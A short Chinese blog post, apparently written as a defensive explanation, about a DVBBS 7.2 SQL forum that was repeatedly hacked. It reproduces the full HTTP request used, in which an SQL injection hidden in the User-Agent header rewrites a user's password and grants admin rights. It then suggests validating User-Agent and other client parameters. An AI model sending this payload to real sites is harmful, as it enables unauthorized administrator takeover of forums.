朋友论坛频频被黑,虽服务器无上传组件且关闭FSO仍遭攻击,分析可能是DV72SQL版本问题,攻击借助桂林老兵写的利用工具。给出攻击数据包内容,提出加检测User - Agent过程,严格控制提交数据客户端环境参数的防黑建议。
近日,有朋友说自己的论坛频频被黑,服务器没有任何的上传组件,已经关闭了FSO.但照样被黑.
也就分析这有可能是DV72SQL版本自身的问题.
据N长时间的较量,朋友得到所谓的攻击方式,其实也无非是借助了桂林老兵写的一个DV72SQL的BUG的利用工具.
提交的数据包内容-----------------
GET /bbs/showerr.asp?BoardID=1&action=OtherErr HTTP/1.1
Referer: http://www.target.com/bbs/showerr.asp?BoardID=1&action=OtherErr
User-Agent: Mozilla/4.0 (compatible;M;M;M;','论坛首页',7,'',2) update Dv_User set UserPassword='4621d373cade4e83',UserGroupID=1 where username='桂林老兵'--Netscape
Host: www.target.com
Cookie:
这些就是即将要攻击的数据.
其实这种东西.只要我们加此检测User-Agent的过程就可以了.
至于如何去写这些代码,相信大家都心中有数了吧?
以后我们在程序的防黑上一定要做足一点.
最好再对提交数据的客户端的环境参数要进行严格的控制.
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
